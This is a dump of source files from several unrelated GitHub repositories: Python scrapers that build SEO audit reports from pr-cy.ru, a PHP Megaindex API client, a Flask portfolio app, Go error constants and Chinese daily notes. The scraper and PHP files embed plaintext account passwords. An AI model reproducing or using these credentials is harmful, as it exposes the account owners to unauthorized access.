0:\n\t\t\t\t\tf.write(name.cssselect('.info-test')[0].text)\n\t\t\t\t\tf.write('</td>')\n\t\t\t\t\tf.write(' ')\n\t\t\t\t\tif len(name.cssselect('.content-test')) > 0:\n\t\t\t\t\t\tif (len(clearStr(name.cssselect('.content-test')[0].text)) > 0):\n\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tf.write(clearStr(name.cssselect('.content-test')[0].text))\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('.iphone .iphone-screen img')) > 0):\n\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tf.write('<img src=\"http://' + name.cssselect('.content-test')[0].cssselect('.iphone .iphone-screen img')[0].get('src')[2:] + '\">')\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('a')) > 0):\n\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tf.write(clearStr(name.cssselect('.content-test')[0].cssselect('a')[0].text))\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('p')) > 0):\n\t\t\t\t\t\t\tnewList2 = name.cssselect('.content-test')[0].cssselect('p')\n\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tfor paragraph in newList2:\n\t\t\t\t\t\t\t\tf.write(clearStr(paragraph.text))\n\t\t\t\t\t\t\t\tf.write('<br>')\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('.progress-info .progress-info')) > 0):\n\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tf.write(clearStr(name.cssselect('.content-test')[0].cssselect('.progress-info .progress-info')[0].text))\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('.progress-info')) > 0):\n\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tf.write(clearStr(name.cssselect('.content-test')[0].cssselect('.progress-info')[0].text))\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('span')) > 0) or ('Системы статистики' in name.cssselect('.info-test')[0].text):\n\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tnewList2 = name.cssselect('.content-test')[0].cssselect('span')\n\t\t\t\t\t\t\tfor analytics in newList2:\n\t\t\t\t\t\t\t\tf.write(clearStr(analytics.text))\n\t\t\t\t\t\t\t\tf.write('<br>')\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\telif (len(name.cssselect('.info-test')) > 0):\n\t\t\t\t\t\tif('Местоположение сервера' in name.cssselect('.info-test')[0].text):\n\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tf.write(name.cssselect('.content-test img')[0].get('alt').split(' ')[2])\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif(('Facebook' in name.cssselect('.info-test')[0].text) or ('ВКонтакте' in name.cssselect('.info-test')[0].text) or ('Google+' in name.cssselect('.info-test')[0].text) or ('Twitter' in name.cssselect('.info-test')[0].text)):\n\t\t\t\t\t\t\tif(name.getparent().cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\t\tf.write('Ссылка на страницу найдена.')\n\t\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif('Favicon' in name.cssselect('.info-test')[0].text):\n\t\t\t\t\t\t\tif(name.getparent().cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\t\tf.write('Отлично, у сайта есть Favicon.')\n\t\t\t\t\t\t\t\tf.write('</td>')\n\t\t\ti += 1\n\t\t\t'''f.write('<td>')\n\t\t\tnewList3 = name.cssselect('.description p')\n\t\t\tfor paragraph in newList3:\n\t\t\tf.write(paragraph.text)'''\n\t\t\tf.write('</tr>')\n\t\t\t\t#f.write('</td></tr>')\n\t\t\t\t#f.write('\\n')\n\t\tprint(i)\n\t\tf.write('</tbody>')\n\t\tf.write('</table>')\n\t\tf.write('''\n\t\t</body>\n\t\t</html>\n\t\t\t''')\n\t\tf.close()\n\t\tsubject = 'Аудит сайта ' + customerList[1]\n\t\tmessage = \"Добрый день, \" + customerList[0] + \". Провели аудит вашего сайта.\"\n\t\t#sendMail(customerList[2], subject, message, 'audit/' + customerList[1] + '.html')\n\t\t#sendMail('[email protected]', subject, message, 'audit/' + customerList[1] + '.html')\n\t\t#time.sleep(10)\n\t\tprint(customerList[0])\n\nroot = Tk()\n\nmainFrame = Frame(root,width=500,height=100,bd=5)\n\nop = askopenfilename()\n\nbuttonStart = Button(mainFrame, text='Start')\n\nbuttonStart.bind(\"<Button-1>\", proof2)\n\nmainFrame.pack()\n\nbuttonStart.pack()\n\nroot.mainloop()\n" }, { "alpha_fraction": 0.5816946029663086, "alphanum_fraction": 0.5938334465026855, "avg_line_length": 32.4878044128418, "blob_id": "71f15c5fca124b4edfecafb03705b728b25048f5", "content_id": "7ad0f4d4a538b9b01f8074da99c0eaafdde84e8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4253, "license_type": "no_license", "max_line_length": 230, "num_lines": 123, "path": "/grabProof.py", "repo_name": "jz36/megaindex-audit", "src_encoding": "UTF-8", "text": "from grab import Grab\nfrom ipdb import set_trace\n\ndef clearStr( string ):\n\treturn string.replace('\\n','').replace('\\t','').replace('\\r','')\n\ng = Grab()\n\ng.go('https://id.pr-cy.ru/signup/login/')\n\ng.doc.set_input('login_email','[email protected]') \ng.doc.set_input('password','biksileev')\ng.doc.submit()\ng.go('https://a.pr-cy.ru/personabook.ru')\n\nnewList = g.css_list('.is')\n\ni = 0\n\nf = open('prcy.html','w')\nf.write('''\n<html>\n<head>\n\t<meta charset=\"utf-8\" />\n</head>\n<body>\n\t''')\nf.write('<table>')\n\nfor name in newList:\n\ttry:\n\t\t'''if 'Скриншот сайта на смартфоне' in name.cssselect('.info-test')[0].text:\n\t\t\t\t\t\t\t\t\tset_trace()'''\n\t\tif not('Обратные ссылки' in name.cssselect('.info-test')[0].text) or not('Аналитика' in name.cssselect('.info-test')[0].text):\n\t\t\ttempVar = name.cssselect('.info-test')[0].text\n\t\t\tset_trace()\n\t\t\tf.write('<tr><td>')\n\t\t\tf.write(name.cssselect('.info-test')[0].text)\n\t\t\tf.write('</td>')\n\t\t\tf.write(' ')\n\t\t\ttry:\n\t\t\t\tnewVar = name.cssselect('.content-test')[0].text\n\t\t\t\tnewVar = newVar.replace('\\n','')\n\t\t\t\tnewVar = newVar.replace('\\t','')\n\t\t\t\tnewVar = newVar.replace('\\r','')\n\t\t\t\tif len(newVar) > 0:\n\t\t\t\t\tf.write('<td>')\n\t\t\t\t\tf.write(newVar)\n\t\t\t\t\tf.write('</td>')\n\t\t\t\telif('Местоположение сервера' in name.cssselect('.info-test')[0].text):\n\t\t\t\t\tf.write('<td>')\n\t\t\t\t\tf.write(name.cssselect('.content-test img')[0].get('alt').split(' ')[2])\n\t\t\t\t\tf.write('</td>')\n\t\t\t\telif(('Facebook' in name.cssselect('.info-test')[0].text) or ('ВКонтакте' in name.cssselect('.info-test')[0].text) or ('Google+' in name.cssselect('.info-test')[0].text) or ('Twitter' in name.cssselect('.info-test')[0].text)):\n\t\t\t\t\tif(name.getparent().cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\tf.write('<td>')\n\t\t\t\t\t\tf.write('Ссылка на страницу найдена.')\n\t\t\t\t\t\tf.write('</td>')\n\t\t\t\telif('Favicon' in name.cssselect('.info-test')[0].text):\n\t\t\t\t\tif(name.getparent().cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\tf.write('<td>')\n\t\t\t\t\t\tf.write('Отлично, у сайта есть Favicon.')\n\t\t\t\t\t\tf.write('</td>')\n\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('.iphone .iphone-screen img')) > 0):\n\t\t\t\t\tf.write('<td>')\n\t\t\t\t\tf.write('<img src=\"http://' + name.cssselect('.content-test')[0].cssselect('.iphone .iphone-screen img')[0].get('src')[2:] + '\">')\n\t\t\t\t\tf.write('</td>')\n\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('a')) > 0):\n\t\t\t\t\tf.write('<td>')\n\t\t\t\t\tf.write(clearStr(name.cssselect('.content-test')[0].cssselect('a')[0].text))\n\t\t\t\t\tf.write('</td>')\n\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('p')) > 0):\n\t\t\t\t\tnewList2 = name.cssselect('.content-test')[0].cssselect('p')\n\t\t\t\t\tf.write('<td>')\n\t\t\t\t\tfor paragraph in newList2:\n\t\t\t\t\t\tf.write(clearStr(paragraph.text))\n\t\t\t\t\t\tf.write('<br>')\n\t\t\t\t\tf.write('</td>')\n\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('.progress-info .progress-info')) > 0):\n\t\t\t\t\tf.write('<td>')\n\t\t\t\t\tf.write(clearStr(name.cssselect('.content-test')[0].cssselect('.progress-info .progress-info')[0].text))\n\t\t\t\t\tf.write('</td>')\n\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('span')) > 0) or ('Системы статистики' in name.cssselect('.info-test')[0].text):\n\t\t\t\t\tf.write('<td>')\n\t\t\t\t\tnewList2 = name.cssselect('.content-test')[0].cssselect('span')\n\t\t\t\t\tfor analytics in newList2:\n\t\t\t\t\t\tf.write(clearStr(analytics.text))\n\t\t\t\t\t\tf.write('<br>')\n\t\t\t\t\tf.write('</td>')\n\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('.progress-info')) > 0):\n\t\t\t\t\tf.write('<td>')\n\t\t\t\t\tf.write(clearStr(name.cssselect('.content-test')[0].cssselect('.progress-info')[0].text))\n\t\t\t\t\tf.write('</td>')\n\t\t\texcept:\n\t\t\t\tpass\n\t\ti += 1\n\t\tf.write('<td>')\n\t\tnewList3 = name.cssselect('.description p')\n\t\tfor paragraph in newList3:\n\t\t\tf.write(paragraph.text)\n\t\tf.write('</td></tr>')\n\t\t#f.write('\\n')\n\texcept Exception:\n\t\t#set_trace()\n\t\tf.write('</td></tr>')\n\t\t#f.write('\\n')\n\t\tpass\nprint(i)\nf.write('</table>')\nf.write('''\n</body>\n</html>\n\t''')\nf.close()\n'''\nfor name in newList:\n\tnewVar = name.text\n\tset_trace()\n\tnewVar = newVar.replace('\\n','')\n\tnewVar = newVar.replace('\\t','')\n\tnewVar = newVar.replace('\\r','')\n\tprint(newVar)\n'''\n" }, { "alpha_fraction": 0.4292944371700287, "alphanum_fraction": 0.4328669309616089, "avg_line_length": 25.046510696411133, "blob_id": "58c306a9196eceef061fd6e8bf0b4472aa8bf96f", "content_id": "fcf4b7df05a0c6e0bfb016a6f4ead4ae53dbe4ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 3429, "license_type": "no_license", "max_line_length": 123, "num_lines": 129, "path": "/proof.php", "repo_name": "jz36/megaindex-audit", "src_encoding": "UTF-8", "text": "<?php\nheader(\"Content-Type: text/html; charset=utf-8\"); \n$methods = array();\n$methods[] = \"reindex_site\";\n$methods[] = \"get_index\";\n$method = $methods[1];\n$sites = array();\n$sites[] = \"biksileev.ru\";\n$sites[] = \"marvel-gold.ru\";\n$sites[] = \"russouvenir.ru\";\n$sites[] = \"blog.biksileev.ru\";\n\n $arr[\"email\"] = \"[email protected]\";\n $arr[\"password\"] = \"NokiaN9777\";\n $arr[\"method\"] = \"add_project\";\n $arr[\"project\"] = $sites[0];\n $arr[\"lr\"][] = \"225\";\n\n\n $array = array();\n $array[\"method\"] = $method;\n $array[\"output\"] = \"json\";\n $array[\"mode\"] = \"site\";\n $array[\"login\"] = \"[email protected]\";\n $array[\"password\"] = \"NokiaN9777\";\n $array[\"url\"] = urlencode($sites[3]);\n $array[\"target\"] = ''; // Необязательный параметр если пустой, вернет дату последней индексации\n $array[\"version_id\"] = \"1\";\n $content = file_get_contents(\"http://api.megaindex.ru/?\".http_build_query($array)); \n $json = json_decode($content); \n \nif(!empty($json->error)){\n echo $json->error;\n}\nif($method == $methods[1]){\n$table .= \"<br><br>РЕЗУЛЬТАТ:\";\n$table .= \"<table border=1>\";\n$table .= \"<tr>\";\n$table .= \"<th>page</th>\";\n$table .= \"<th>level</th>\"; \n$table .= \"<th>status</th>\"; \n$table .= \"<th>keywords</th>\"; \n$table .= \"<th>description</th>\"; \n$table .= \"<th>title</th>\";\n$table .= \"<th>h1</th>\"; \n$table .= \"<th>chars</th>\"; \n$table .= \"<th>wc</th>\"; \n$table .= \"<th>quality</th>\"; \n$table .= \"<th>uniq_content</th>\"; \n$table .= \"<th>count_ls_to</th>\"; \n$table .= \"<th>count_ls_from</th>\"; \n$table .= \"<th>count_vs_to</th>\"; \n$table .= \"<th>count_vs_from</th>\"; \n$table .= \"</tr>\";\n \nforeach($json as $array){\n $table .= \"<tr>\";\n \n $table .= \"<td>\";\n $table .= $array->page;\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->level;\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->status;\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->keywords;\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->description;\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->title;\n $table .= \"</td>\"; \n \n $table .= \"<td>\";\n foreach($array->h1 as $key => $element){ \n $table .= $element.'<br>';\n }\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->chars;\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->wc;\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->quality;\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->uniq_content;\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->count_ls_to;\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->count_ls_from;\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->count_vs_to;\n $table .= \"</td>\";\n\n $table .= \"<td>\";\n $table .= $array->count_vs_from;\n $table .= \"</td>\";\n \n $table .= \"</tr>\";\n}\n$table .= \"</table>\";\necho $table;\n}\nelseif(!empty($json->report)){\n echo $json->report;\n exit;\n}" } ]
7
ekta1999/Portfolio
https://github.com/ekta1999/Portfolio
61a54e05ccb85639ef04ffdb9177c2eb1ba16da0
a56e1252dfe6e4909ce3f769932646e677f076ea
bf51ad5b72ef2b8e6e3894ac3f8ccb9c844c7048
refs/heads/master
2020-04-15T01:55:00.526213
2019-11-03T12:34:10
2019-11-03T12:34:10
164,296,122
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7558139562606812, "alphanum_fraction": 0.7848837375640869, "avg_line_length": 56.33333206176758, "blob_id": "417bf4c60eb6dda653910372c1429e714ab000cb", "content_id": "93b005a4a8d96a5bcc4a4b86583c72dd53c3da50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 172, "license_type": "no_license", "max_line_length": 92, "num_lines": 3, "path": "/README.md", "repo_name": "ekta1999/Portfolio", "src_encoding": "UTF-8", "text": "# Portfolio\nThis repository is to create a sample portfolio web application. \nyou can checkout this here : http://secure-journey-97190.herokuapp.com/ :sparkles::sparkles:\n" }, { "alpha_fraction": 0.6569966077804565, "alphanum_fraction": 0.6791808605194092, "avg_line_length": 16.787878036499023, "blob_id": "2a4f5dfaf804f752cbc145f584e254b984d5613f", "content_id": "0631e314d491010e347e4db2f8d28b1ff169dd46", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 586, "license_type": "no_license", "max_line_length": 40, "num_lines": 33, "path": "/folio.py", "repo_name": "ekta1999/Portfolio", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template\nimport json\n\napp = Flask(\"Portfolio\")\n\n\[email protected]('/')\ndef index():\n\treturn render_template('index.html')\n\[email protected]('/images')\ndef images():\n\treturn render_template('images.html')\n\[email protected]('/page1')\ndef page1():\n\treturn render_template('page1.html')\n\[email protected]('/page2')\ndef page2():\n\treturn render_template('page2.html')\n\[email protected]('/page3')\ndef page3():\n\treturn render_template('page3.html')\n\[email protected]('/explore')\ndef explore():\n\treturn render_template('explore.html')\n\n\nif __name__ == \"__main__\":\n\tapp.run(port = 8000, debug = True)" } ]
2
isabella232/okta-aws-python-example
https://github.com/isabella232/okta-aws-python-example
17f284b7286be2417fbb6e8f903fb1f4fcd7d51b
c2b268b41e25fe6c44aaa6b6209f3e32d62744a6
223ab5d52a2e31414deb9587d0010cfd3e5b871b
refs/heads/main
2023-03-21T02:35:06.332627
2020-11-20T15:34:39
2020-11-20T15:34:39
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.708737850189209, "alphanum_fraction": 0.708737850189209, "avg_line_length": 32, "blob_id": "17b06542f74d68d55c13e99bcc0d6ea7438e7ab2", "content_id": "c31b17a5acf7c8287979d6231927786c0db34c2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 206, "license_type": "no_license", "max_line_length": 49, "num_lines": 6, "path": "/server/FileHandler.py", "repo_name": "isabella232/okta-aws-python-example", "src_encoding": "UTF-8", "text": "from tornado.web import StaticFileHandler\n\nclass FileHandler(StaticFileHandler):\n def initialize(self, path):\n self.absolute_path = False\n super(FileHandler, self).initialize(path)\n " }, { "alpha_fraction": 0.571966826915741, "alphanum_fraction": 0.5825169682502747, "avg_line_length": 25.039215087890625, "blob_id": "97d2dfff14dfa2c02fa486c3a61de86f5d430863", "content_id": "b9bf2467153e8d4f477627ae66d91152db703620", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1327, "license_type": "no_license", "max_line_length": 67, "num_lines": 51, "path": "/auth-app/messages/messages.py", "repo_name": "isabella232/okta-aws-python-example", "src_encoding": "UTF-8", "text": "import base64\nimport json\nfrom jwt import (JWT, jwk_from_dict)\nfrom jwt.exceptions import JWTDecodeError\nimport os\n\ninstance = JWT()\npublic_keys = {}\npublic_key = None\nmessages = [\"Messages\"]\n\ndef message(event, context):\n body = get_post_data(event['body'])\n result = verify(body['token'])\n if not bool(result):\n messages.append(body['message'])\n result = { \n 'statusCode': 200,\n 'headers': {\n 'Access-Control-Allow-Headers': 'Content-Type',\n 'Access-Control-Allow-Origin': '*',\n 'Access-Control-Allow-Methods': 'OPTIONS,POST,GET',\n },\n 'body': json.dumps(messages) \n }\n return result\n\ndef get_post_data(body):\n postdata = {}\n for items in body.split('&'):\n values = items.split('=')\n postdata[values[0]] = values[1]\n return postdata\n\ndef verify(token):\n result = {}\n try:\n decoded = instance.decode(token, public_key, False)\n except JWTDecodeError:\n result = { 'statusCode': 403, 'body': 'Forbidden '}\n return result\n\ndef get_keys():\n keys = base64.b64decode(os.environ['OKTA_KEYS'])\n jwks = json.loads(keys)\n for jwk in jwks['keys']:\n kid = jwk['kid']\n public_key = jwk_from_dict(jwk)\n public_keys[kid] = public_key\n\nget_keys()" }, { "alpha_fraction": 0.7355982065200806, "alphanum_fraction": 0.7415066361427307, "avg_line_length": 29.772727966308594, "blob_id": "4d6888ba13769c8561936b9766a7bf5d152b5416", "content_id": "b7a5e0a3b39d6d638df1d3cd54bb317c7cdc3ce6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 677, "license_type": "no_license", "max_line_length": 57, "num_lines": 22, "path": "/server/__main__.py", "repo_name": "isabella232/okta-aws-python-example", "src_encoding": "UTF-8", "text": "import signal\nimport sys\nfrom tornado.httpserver import HTTPServer\nfrom tornado.ioloop import IOLoop\nfrom tornado.options import define, options\nfrom tornado.web import Application, RequestHandler\nfrom server.FileHandler import FileHandler\n\ndefine(\"port\", default=8080, help=\"Listener port\")\noptions.parse_command_line()\napplication = Application([\n ('/()$', FileHandler, {'path': \"client/index.html\"}),\n ('/(.*)', FileHandler, {'path': \"client\"}),\n])\nhttp_server = HTTPServer(application)\nhttp_server.listen(options.port)\nprint(\"Listening on port\", options.port)\ntry:\n IOLoop.current().start()\nexcept KeyboardInterrupt:\n print(\"Exiting\")\n IOLoop.current().stop()\n" }, { "alpha_fraction": 0.7335907220840454, "alphanum_fraction": 0.7335907220840454, "avg_line_length": 31.375, "blob_id": "3a164e7acea4eef4cbc736148f67b2e0240b6e2e", "content_id": "9b1ae5840dceab0beb1da8a9c2434adde84fc9f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 259, "license_type": "no_license", "max_line_length": 130, "num_lines": 8, "path": "/README.md", "repo_name": "isabella232/okta-aws-python-example", "src_encoding": "UTF-8", "text": "# aws-python\nHow to write a secure Python Serverless App on AWS Lambda\n\nI you get an error message from `pip`: `ModuleNotFoundError: No module named 'pip._internal.cli.main'`you need to reinstall `pip`.\n\n```bash\npython -m pip install --upgrade pip --user\n```\n" } ]
4
Deependrakumarrout/Diet-and-Exercise-Instructor
https://github.com/Deependrakumarrout/Diet-and-Exercise-Instructor
b27bab6d17adf921d64082be7e62ccadf60253bd
6933bcd1c3489487e2e2e013f2b49aec10ff87fb
6c97a96abc339a67936206f1db87f29540fc2668
refs/heads/master
2020-08-07T14:57:16.334812
2019-10-07T22:19:30
2019-10-07T22:19:30
213,496,625
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.641363263130188, "alphanum_fraction": 0.6467854380607605, "avg_line_length": 38.69230651855469, "blob_id": "60d5926b2da68c20e8f1fbef0fa2a21a9964b259", "content_id": "16fe766953a18f28684cee443f54f6105caee85b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2582, "license_type": "no_license", "max_line_length": 111, "num_lines": 65, "path": "/Diet and Exercise instructor.py", "repo_name": "Deependrakumarrout/Diet-and-Exercise-Instructor", "src_encoding": "UTF-8", "text": "\n#A function to show the recent time.\ndef getdate():\n import datetime\n return datetime.datetime.now()\n\n#Dictionary of client.\nclient_list={1:\"Mohan\",2:\"Rajan\",3:\"Lathor\"}\n#Instructor recommended list.\nrecommended_list={1:\"Diet\",2:\"Exercise\"}\n#To log or retrieve option.\nlog_or_retrieve={1:\"log\",2:\"retrieve\"}\n\n#Client dictionary process-\nprint()\nprint(\"Please select one of the client:\")\nfor key,value in client_list.items():\n print(f\"Press {key} for {value}\")\ntry:\n client_name=int(input(\"Enter here:\"))\n\n if client_name == 1 or client_name == 2 or client_name == 3:\n print(f\"You have selected to {client_list[client_name]}\")\n\n #Instructor recommended dictionary process-\n print()\n print(\"Please select the recommended option:\")\n for key,value in recommended_list.items():\n print(f\"Press {key} for {value}\")\n recommended_name=int(input(\"Enter here:\"))\n if recommended_name == 1 or recommended_name == 2:\n print(f\"You have selected to {recommended_list[recommended_name]}\")\n\n #Option for log or retrieve\n print()\n print(\"sir/Ma'am what you want to do [log or retrieve] :\")\n for key,value in log_or_retrieve.items():\n print(f\"Press {key} for {value}\")\n log_or_retrieve_input=int(input(\"Enter here:\"))\n\n #if User select log then it will create a new file for that.\n if log_or_retrieve_input == 1:\n print(\"You have selected to log:\")\n print(\"Generating: \"+client_list[client_name]+\"_\"+recommended_list[recommended_name]+\" type schedule:\")\n file=open(client_list[client_name]+\"_\"+recommended_list[recommended_name]+\".txt\",\"a\")\n repeat=\"y\"\n while repeat not in \"n\":\n input_txt=input(f\"Enter the recommended to do {recommended_list[recommended_name]}:\")\n file.write(\"[\"+str(getdate())+\"]\" + input_txt + \"\\n\")\n repeat=input(\"Press y to continue or n to stop:\")\n continue\n file.close()\n\n #if retrieve then it will show what the instructor gave the advice to client.\n elif log_or_retrieve_input == 2:\n print(\"You have selected to retrieve:\")\n print(client_list[client_name]+\"_\"+recommended_list[recommended_name]+\" Report:\")\n file=open(client_list[client_name]+\"_\"+recommended_list[recommended_name]+\".txt\",\"rt\")\n contant=file.readlines()\n for line in contant:\n print(line,end=\"\")\n file.close()\n else:\n print(\"Please put the correct number to proceed\")\nexcept:\n print(\"[You are not allow to give these option see above you have type wrong input..]\")\n\n" } ]
1
tofar/bingyan-summer-camp2018
https://github.com/tofar/bingyan-summer-camp2018
1c3404ef303b93e5cc514133f1e8abed22eed3c4
0907bdd9be62806189c751bf86faec791d666edc
9f4f25ed640c9aa6068873b54944e399abae3b49
refs/heads/master
2018-10-11T06:53:26.732182
2018-07-26T10:13:58
2018-07-26T10:13:58
138,950,886
6
8
null
null
null
null
null
[ { "alpha_fraction": 0.6399999856948853, "alphanum_fraction": 0.7200000286102295, "avg_line_length": 9.857142448425293, "blob_id": "e0ad965fe85c2d7b1c86bce621c4ca7e1fd67fba", "content_id": "871673495bda4f70e3c66039a075d7e3275e578f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 165, "license_type": "no_license", "max_line_length": 40, "num_lines": 7, "path": "/Shixiaoyanger/日报/7.24.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.24日报\n\n1.部署了nginx\n\n2.调试接口,因为对js语法不熟悉,卡了好久,最终凑合能交互了,明天要写出前端来\n\n3.加密分享" }, { "alpha_fraction": 0.7551020383834839, "alphanum_fraction": 0.8163265585899353, "avg_line_length": 8.800000190734863, "blob_id": "6bd04c87ae1ef31ad7274db37600acd2fa1608b6", "content_id": "29ac6af4726e2abe37fdfe7d1fc4a5b6dc38729a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 113, "license_type": "no_license", "max_line_length": 25, "num_lines": 5, "path": "/jackwener/日报/7.14.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.14日报\n\n把除了cookie外的和网页认证外的基本都实现了。\n\n晚上想了想重构代码的事\n" }, { "alpha_fraction": 0.6219512224197388, "alphanum_fraction": 0.6951219439506531, "avg_line_length": 8.222222328186035, "blob_id": "48fa2dbcc2721f5ede529099dccd4ce48fd51a97", "content_id": "35b1cc8c355a9035292506f2c44df4d83ea3851a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 168, "license_type": "no_license", "max_line_length": 23, "num_lines": 9, "path": "/Shixiaoyanger/日报/7.22.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.22日报\n\n**周末没干太多事**\n\n1.写了记录时间的函数以及最新查询\n\n2.图片的传输、储存\n\n3.看了点JavaScript,打算开始写前端" }, { "alpha_fraction": 0.5870580673217773, "alphanum_fraction": 0.6497665047645569, "avg_line_length": 31.23655891418457, "blob_id": "2d8676f46c2ec32f5d94282314460d2a1f8feb7c", "content_id": "26a75fc44cc33c8cbda94f2db160eadf11a46fd8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 3600, "license_type": "no_license", "max_line_length": 86, "num_lines": 93, "path": "/Shixiaoyanger/market/controllers/Main.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package controllers\n\nimport (\n\t\"github.com/astaxie/beego\"\n\t\"market/models\"\n)\n// Predefined const error strings.\nconst (\n\tErrInputData = \"数据输入错误\"\n\tErrDatabase = \"数据库操作错误\"\n\tErrDupUser = \"用户信息已存在\"\n\tErrNoUser = \"用户信息不存在\"\n\tErrPass = \"密码不正确\"\n\tErrNoUserPass = \"用户信息不存在或密码不正确\"\n\tErrNoUserChange = \"用户信息不存在或数据未改变\"\n\tErrInvalidUser = \"用户信息不正确\"\n\tErrOpenFile = \"打开文件出错\"\n\tErrWriteFile = \"写文件出错\"\n\tErrSystem = \"操作系统错误\"\n)\n\n// ControllerError is controller error info structer.\ntype ControllerError struct {\n\tStatus int `json:\"status\"`\n\tCode int `json:\"code\"`\n\tMessage string `json:\"message\"`\n\tDevInfo string `json:\"dev_info\"`\n\tMoreInfo string `json:\"more_info\"`\n}\ntype UserStruct struct{\n\tUser \t \t models.User\n\tStatusCode *StatusCode\n}\ntype GoodsStruct struct{\n\tGoodsinfo \t[]*models.Goods\n\tStatusCode *StatusCode\n}\ntype StatusCode struct{\n\tStatus int64 \t `json:\"status\"`\n\tCode int64 \t `json:\"code\"`\n\tMessage string \t `json:\"message\"`\n\tDevInfo string \t `json:\"dev_info\"`\n\tMoreInfo string \t `json:\"more_info\"`\n\n}\n\n// Predefined controller error values.\nvar (\n\terr404 = &ControllerError{404, 404, \"page not found\", \"page not found\", \"\"}\n\terrInputData = &ControllerError{400, 10001, \"数据输入错误\", \"客户端参数错误\", \"\"}\n\terrDatabase1 = &ControllerError{500, 10002, \"服务器错误\", \"数据库操作错误\", \"\"}\n\terrDupUser = &ControllerError{400, 10003, \"用户信息已存在\", \"数据库记录重复\", \"\"}\n\terrNoUser = &ControllerError{400, 10004, \"用户信息不存在\", \"数据库记录不存在\", \"\"}\n\terrPass = &ControllerError{400, 10005, \"用户信息不存在或密码不正确\", \"密码不正确\", \"\"}\n\terrNoUserPass = &ControllerError{400, 10006, \"用户信息不存在或密码不正确\", \"数据库记录不存在或密码不正确\", \"\"}\n\terrNoUserChange = &ControllerError{400, 10007, \"用户信息不存在或数据未改变\", \"数据库记录不存在或数据未改变\", \"\"}\n\terrInvalidUser = &ControllerError{400, 10008, \"用户信息不正确\", \"Session信息不正确\", \"\"}\n\terrOpenFile = &ControllerError{500, 10009, \"服务器错误\", 